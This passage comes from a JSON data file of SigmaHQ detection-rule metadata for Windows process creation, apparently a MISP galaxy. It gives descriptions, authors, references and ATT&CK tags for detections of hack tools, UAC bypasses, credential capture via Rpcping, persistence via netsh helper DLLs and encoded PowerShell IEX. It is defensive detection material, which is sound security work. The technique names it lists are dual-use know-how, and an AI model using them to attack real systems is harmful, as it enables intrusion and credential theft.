like Process Hacker to view and manipulate processes, kernel options and other low level stuff", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", "creation_date": "2022-10-10", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_hktl_pchunter.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", "https://web.archive.org/web/20231210115125/http://www.xuetr.com/", "https://www.hexacorn.com/blog/2018/04/20/kernel-hacking-tool-you-might-have-never-heard-of-xuetr-pchunter/", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_pchunter.yml" ], "tags": [ "attack.execution", "attack.discovery", "attack.t1082", "attack.t1057", "attack.t1012", "attack.t1083", "attack.t1007" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8f4a33ec-8b1f-4b80-a2f6-642b2e479580", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "c32f7008-9fea-41f7-8366-5eb9b74bd896", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "7bc57495-ea59-4380-be31-a64af124ef18", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "322bad5a-1c49-4d23-ab79-76d641794afa", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fca949cc-79ca-446e-8064-01aa7e52ece5", "value": "HackTool - PCHunter Execution" }, { "description": "Detects when an admin share is mounted using net.exe", "meta": { "author": "oscd.community, Teymur Kheirkhabarov @HeirhabarovT, Zach Stanford @svch0st, wagga", "creation_date": "2020-10-05", "falsepositive": [ "Administrators" ], "filename": "proc_creation_win_net_use_mount_admin_share.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_mount_admin_share.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": 
"3abd6094-7027-475f-9630-8ab9be7b9725", "value": "Windows Admin Share Mount Via Net.EXE" }, { "description": "Detects execution of a renamed autohotkey.exe binary based on PE metadata fields", "meta": { "author": "Nasreddine Bencherchali", "creation_date": "2023-02-07", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_renamed_autohotkey.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://thedfirreport.com/2023/02/06/collect-exfiltrate-sleep-repeat/", "https://www.autohotkey.com/download/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_renamed_autohotkey.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "0f16d9cf-0616-45c8-8fad-becc11b5a41c", "value": "Renamed AutoHotkey.EXE Execution" }, { "description": "Detects the removal of Sysmon, which could be a potential attempt at defense evasion", "meta": { "author": "frack113", "creation_date": "2022-01-12", "falsepositive": [ "Legitimate administrators might use this command to remove Sysmon for debugging purposes" ], "filename": "proc_creation_win_sysinternals_sysmon_uninstall.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md#atomic-test-11---uninstall-sysmon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_sysmon_uninstall.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6a5f68d1-c4b5-46b9-94ee-5324892ea939", "value": "Uninstall Sysinternals Sysmon" }, { "description": "Detect suspicious parent processes of well-known Windows processes", "meta": { 
"author": "vburov", "creation_date": "2019-02-23", "falsepositive": [ "Some security products seem to spawn these" ], "filename": "proc_creation_win_susp_proc_wrong_parent.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.carbonblack.com/2014/06/10/screenshot-demo-hunt-evil-faster-than-ever-with-carbon-black/", "https://www.13cubed.com/downloads/windows_process_genealogy_v2.pdf", "https://web.archive.org/web/20180718061628/https://securitybytes.io/blue-team-fundamentals-part-two-windows-processes-759fe15965e2", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_proc_wrong_parent.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036.003", "attack.t1036.005" ] }, "related": [ { "dest-uuid": "bd5b58a4-a52d-4a29-bc0d-3f1d3968eb6b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "1c4e5d32-1fe9-4116-9d9d-59e3925bd6a2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "96036718-71cc-4027-a538-d1587e0006a7", "value": "Windows Processes Suspicious Parent Directory" }, { "description": "Detects execution of \"VSDiagnostics.exe\" with the \"start\" command in order to launch and proxy arbitrary binaries.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-08-03", "falsepositive": [ "Legitimate usage for tracing and diagnostics purposes" ], "filename": "proc_creation_win_vsdiagnostics_execution_proxy.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0xBoku/status/1679200664013135872", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vsdiagnostics_execution_proxy.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": 
"457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ac1c92b4-ac81-405a-9978-4604d78cc47e", "value": "Potential Binary Proxy Execution Via VSDiagnostics.EXE" }, { "description": "Detects new process creation using WMIC via the \"process call create\" flag", "meta": { "author": "Michael Haag, Florian Roth (Nextron Systems), juju4, oscd.community", "creation_date": "2019-01-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wmic_process_creation.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/84215139ee5127f8e3a117e063b604812bd71928/atomics/T1047/T1047.md#atomic-test-5---wmi-execute-local-process", "https://www.sans.org/blog/wmic-for-incident-response/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_process_creation.yml" ], "tags": [ "attack.execution", "attack.t1047", "car.2016-03-002" ] }, "related": [ { "dest-uuid": "01a5a209-b94c-450b-b7f9-946497d91055", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "526be59f-a573-4eea-b5f7-f0973207634d", "value": "New Process Created Via Wmic.EXE" }, { "description": "Detects the execution of netsh with \"add helper\" flag in order to add a custom helper DLL. 
This technique can be abused to add a malicious helper DLL that can be used as a persistence proxy that gets called when netsh.exe is executed.\n", "meta": { "author": "Victor Sergeev, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_netsh_helper_dll_persistence.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.007/T1546.007.md", "https://web.archive.org/web/20160928212230/https://www.adaptforward.com/2016/09/using-netshell-to-execute-evil-dlls-and-persist-on-a-host/", "https://github.com/outflanknl/NetshHelperBeacon", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml" ], "tags": [ "attack.privilege-escalation", "attack.persistence", "attack.t1546.007", "attack.s0108" ] }, "related": [ { "dest-uuid": "f63fe421-b1d1-45c0-b8a7-02cd16ff2bed", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "56321594-9087-49d9-bf10-524fe8479452", "value": "Potential Persistence Via Netsh Helper DLL" }, { "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.\n", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-02-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_calc_uncommon_exec.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/ItsReallyNick/status/1094080242686312448", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_calc_uncommon_exec.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": 
"42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "737e618a-a410-49b5-bec3-9e55ff7fbc15", "value": "Suspicious Calculator Usage" }, { "description": "Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_msconfig_gui.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ad92e3f9-7eb6-460e-96b1-582b0ccbb980", "value": "UAC Bypass Using MSConfig Token Modification - Process" }, { "description": "Detects execution of powershell scripts via Runscripthelper.exe", "meta": { "author": "Victor Sergeev, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_runscripthelper.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Runscripthelper/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_runscripthelper.yml" ], "tags": [ "attack.execution", "attack.t1059", "attack.defense-evasion", "attack.t1202" ] }, "related": [ { "dest-uuid": "7385dfaf-6886-4229-9ecd-6fd678040830", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": 
"3b0e52ce-517a-4614-a523-1bd5deef6c5e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "eca49c87-8a75-4f13-9c73-a5a29e845f03", "value": "Suspicious Runscripthelper.exe" }, { "description": "Detects execution of PktMon, a tool that captures network packets.", "meta": { "author": "frack113", "creation_date": "2022-03-17", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_pktmon_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Pktmon/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pktmon_execution.yml" ], "tags": [ "attack.credential-access", "attack.t1040" ] }, "related": [ { "dest-uuid": "3257eb21-f9a7-4430-8de1-d8b6e288f529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f956c7c1-0f60-4bc5-b7d7-b39ab3c08908", "value": "PktMon.EXE Execution" }, { "description": "Detects shell spawned from Java host process, which could be a sign of exploitation (e.g. 
log4j exploitation)", "meta": { "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", "creation_date": "2021-12-17", "falsepositive": [ "Legitimate calls to system binaries", "Company specific internal usage" ], "filename": "proc_creation_win_java_susp_child_process_2.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20231230220738/https://www.lunasec.io/docs/blog/log4j-zero-day/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_java_susp_child_process_2.yml" ], "tags": [ "attack.initial-access", "attack.persistence", "attack.privilege-escalation" ] }, "uuid": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", "value": "Shell Process Spawned by Java.EXE" }, { "description": "Detects executable names or flags used by Htran or Htran-like tools (e.g. NATBypass)", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-12-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_htran_or_natbypass.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/cw1997/NATBypass", "https://github.com/HiwinCN/HTran", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_htran_or_natbypass.yml" ], "tags": [ "attack.command-and-control", "attack.t1090", "attack.s0040" ] }, "related": [ { "dest-uuid": "731f4f55-b6d0-41d1-a7a9-072a66389aea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f5e3b62f-e577-4e59-931e-0a15b2b94e1e", "value": "HackTool - Htran/NATBypass Execution" }, { "description": "The .SettingContent-ms file type was introduced in Windows 10 and allows a user to create \"shortcuts\" to various Windows 10 setting pages. 
These files are simply XML and contain paths to various Windows 10 settings binaries.", "meta": { "author": "Sreeman", "creation_date": "2020-03-13", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_arbitrary_shell_execution_via_settingcontent.yml" ], "tags": [ "attack.t1204", "attack.t1566.001", "attack.execution", "attack.initial-access" ] }, "related": [ { "dest-uuid": "8c32eb4d-805f-4fc5-bf60-c4d476c131b5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2e34237d-8574-43f6-aace-ae2915de8597", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "24de4f3b-804c-4165-b442-5a06a2302c7e", "value": "Arbitrary Shell Command Execution Via Settingcontent-Ms" }, { "description": "Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)", "meta": { "author": "Christian Burkard (Nextron Systems)", "creation_date": "2021-08-30", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_uac_bypass_dismhost.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/hfiref0x/UACME", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1548.002" ] }, "related": [ { "dest-uuid": "120d5519-3098-4e1c-9191-2aa61232f073", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "853e74f9-9392-4935-ad3b-2e8c040dae86", "value": 
"UAC Bypass Using DismHost" }, { "description": "Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process.", "meta": { "author": "Julia Fomina, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_rpcping_credential_capture.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/hh875578(v=ws.11)", "https://twitter.com/vysecurity/status/873181705024266241", "https://twitter.com/vysecurity/status/974806438316072960", "https://lolbas-project.github.io/lolbas/Binaries/Rpcping/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rpcping_credential_capture.yml" ], "tags": [ "attack.credential-access", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "93671f99-04eb-4ab4-a161-70d446a84003", "value": "Capture Credentials with Rpcping.exe" }, { "description": "Detects creation of a new service via \"sc\" command or the powershell \"new-service\" cmdlet with suspicious binary paths", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-14", "falsepositive": [ "Unlikely" ], "filename": "proc_creation_win_susp_service_creation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_creation.yml" ], "tags": [ "attack.persistence", "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "17a1be64-8d88-40bf-b5ff-a4f7a50ebcc8", "value": "Suspicious New Service Creation" }, { "description": "Detects usage of a base64 encoded \"IEX\" cmdlet in a process command line", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2019-08-23", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_base64_iex.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_base64_iex.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "88f680b8-070e-402c-ae11-d2914f2257f1", "value": "PowerShell Base64 Encoded IEX Cmdlet" }, { "description": "Detects a suspicious or uncommon parent processes of PowerShell", "meta": { "author": "Teymur Kheirkhabarov, Harish Segar", "creation_date": "2020-03-20", "falsepositive": [ "Other scripts" ], "filename": "proc_creation_win_powershell_susp_parent_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_susp_parent_process.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": 
"970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "754ed792-634f-40ae-b3bc-e0448d33f695", "value": "Suspicious PowerShell Parent Process" }, { "description": "Detects a remote file copy attempt to a hidden network share. This may indicate lateral movement or data staging activity.", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-27", "falsepositive": [ "Other programs that cause these patterns (please report)" ], "filename": "proc_creation_win_susp_priv_escalation_via_named_pipe.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/privilege-escalation-via-named-pipe-impersonation.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_priv_escalation_via_named_pipe.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021" ] }, "related": [ { "dest-uuid": "54a649ff-439a-41a4-9856-8d144a2551ba", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9bd04a79-dabe-4f1f-a5ff-92430265c96b", "value": "Privilege Escalation via Named Pipe Impersonation" }, { "description": "Detects suspicious DACL modifications to deny access to a service that affects critical trustees. 
This can be used to hide services or make them unstoppable.", "meta": { "author": "Jonhnathan Ribeiro, oscd.community", "creation_date": "2020-10-16", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_sc_sdset_deny_service_access.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.sans.org/blog/red-team-tactics-hiding-windows-services/", "https://learn.microsoft.com/en-us/windows/win32/secauthz/sid-strings", "https://itconnect.uw.edu/tools-services-support/it-systems-infrastructure/msinf/other-help/understanding-sddl-syntax/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sc_sdset_deny_service_access.yml" ], "tags": [ "attack.persistence", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "99cf1e02-00fb-4c0d-8375-563f978dfd37", "value": "Deny Service Access Using Security Descriptor Tampering Via Sc.EXE" }, { "description": "When configured with suitable command line arguments, w32tm can act as a delay mechanism", "meta": { "author": "frack113", "creation_date": "2022-09-25", "falsepositive": [ "Legitimate use" ], "filename": "proc_creation_win_w32tm.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://blogs.blackberry.com/en/2022/05/dirty-deeds-done-dirt-cheap-russian-rat-offers-backdoor-bargains", "https://github.com/redcanaryco/atomic-red-team/blob/d0dad62dbcae9c60c519368e82c196a3db577055/atomics/T1124/T1124.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_w32tm.yml" ], "tags": [ "attack.discovery", "attack.t1124" ] }, "related": [ { "dest-uuid": "f3c544dc-673c-4ef3-accb-53229f1ae077", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": 
"related-to" } ], "uuid": "6da2c9f5-7c53-401b-aacb-92c040ce1215", "value": "Use of W32tm as Timer" }, { "description": "Detects when a share is mounted using the \"net.exe\" utility", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-02-02", "falsepositive": [ "Legitimate activity by administrators and scripts" ], "filename": "proc_creation_win_net_use_mount_share.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://drive.google.com/file/d/1lKya3_mLnR3UQuCoiYruO3qgu052_iS_/view", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_use_mount_share.yml" ], "tags": [ "attack.lateral-movement", "attack.t1021.002" ] }, "related": [ { "dest-uuid": "4f9ca633-15c5-463c-9724-bdcd54fde541", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f117933c-980c-4f78-b384-e3d838111165", "value": "Windows Share Mount Via Net.EXE" }, { "description": "Detects the execution of rundll32.exe with the oledb32.dll library to open a UDL file.\nThreat actors can abuse this technique as a phishing vector to capture authentication credentials or other sensitive data.\n", "meta": { "author": "@kostastsale", "creation_date": "2024-08-16", "falsepositive": [ "UDL files serve as a convenient and flexible tool for managing and testing database connections in various development and administrative scenarios." 
], "filename": "proc_creation_win_rundll32_udl_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://trustedsec.com/blog/oops-i-udld-it-again", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_udl_exec.yml" ], "tags": [ "attack.execution", "attack.t1218.011", "attack.t1071" ] }, "related": [ { "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "355be19c-ffc9-46d5-8d50-d6a036c675b6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0ea52357-cd59-4340-9981-c46c7e900428", "value": "Potentially Suspicious Rundll32.EXE Execution of UDL File" }, { "description": "Well-known TAP software installation. Possible preparation for data exfiltration using tunneling techniques", "meta": { "author": "Daniil Yugoslavskiy, Ian Davis, oscd.community", "creation_date": "2019-10-24", "falsepositive": [ "Legitimate OpenVPN TAP installation" ], "filename": "proc_creation_win_tapinstall_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://community.openvpn.net/openvpn/wiki/ManagingWindowsTAPDrivers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tapinstall_execution.yml" ], "tags": [ "attack.exfiltration", "attack.t1048" ] }, "related": [ { "dest-uuid": "a19e86f8-1c0a-4fea-8407-23b73d615776", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "99793437-3e16-439b-be0f-078782cf953d", "value": "Tap Installer Execution" }, { "description": "Detects the usage of the \"Accesschk\" utility, an access and privilege audit tool developed by SysInternal and often being abused by attacker to verify process privileges", 
"meta": { "author": "Teymur Kheirkhabarov (idea), Mangatas Tondang, oscd.community, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2020-10-13", "falsepositive": [ "System administrator Usage" ], "filename": "proc_creation_win_sysinternals_accesschk_check_permissions.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.youtube.com/watch?v=JGs-aKf2OtU&ab_channel=OFFZONEMOSCOW", "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment?slide=43", "https://github.com/gladiatx0r/Powerless/blob/04f553bbc0c65baf4e57344deff84e3f016e6b51/Powerless.bat", "https://github.com/carlospolop/PEASS-ng/blob/fa0f2e17fbc1d86f1fd66338a40e665e7182501d/winPEAS/winPEASbat/winPEAS.bat", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_accesschk_check_permissions.yml" ], "tags": [ "attack.discovery", "attack.t1069.001" ] }, "related": [ { "dest-uuid": "a01bf75f-00b2-4568-a58f-565ff9bf202b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c625d754-6a3d-4f65-9c9a-536aea960d37", "value": "Permission Check Via Accesschk.EXE" }, { "description": "Detects potentially suspicious file downloads from file sharing domains using wget.exe", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-05-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_wget_download_susp_file_sharing_domains.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/WithSecureLabs/iocs/blob/344203de742bb7e68bd56618f66d34be95a9f9fc/FIN7VEEAM/iocs.csv", "https://labs.withsecure.com/publications/fin7-target-veeam-servers", 
"https://www.microsoft.com/en-us/security/blog/2024/01/17/new-ttps-observed-in-mint-sandstorm-campaign-targeting-high-profile-individuals-at-universities-and-research-orgs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wget_download_susp_file_sharing_domains.yml" ], "tags": [ "attack.execution" ] }, "uuid": "a0d7e4d2-bede-4141-8896-bc6e237e977c", "value": "Suspicious File Download From File Sharing Domain Via Wget.EXE" }, { "description": "Detects usage of Msiexec.exe to install packages hosted remotely quietly", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-10-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_msiexec_install_remote.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_remote.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.007" ] }, "related": [ { "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "8150732a-0c9d-4a99-82b9-9efb9b90c40c", "value": "Suspicious Msiexec Quiet Install From Remote Location" }, { "description": "Detects the export of the target Registry key to a file.", "meta": { "author": "Oddvar Moe, Sander Wiebing, oscd.community", "creation_date": "2020-10-07", "falsepositive": [ "Legitimate export of keys" ], "filename": "proc_creation_win_regedit_export_keys.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", 
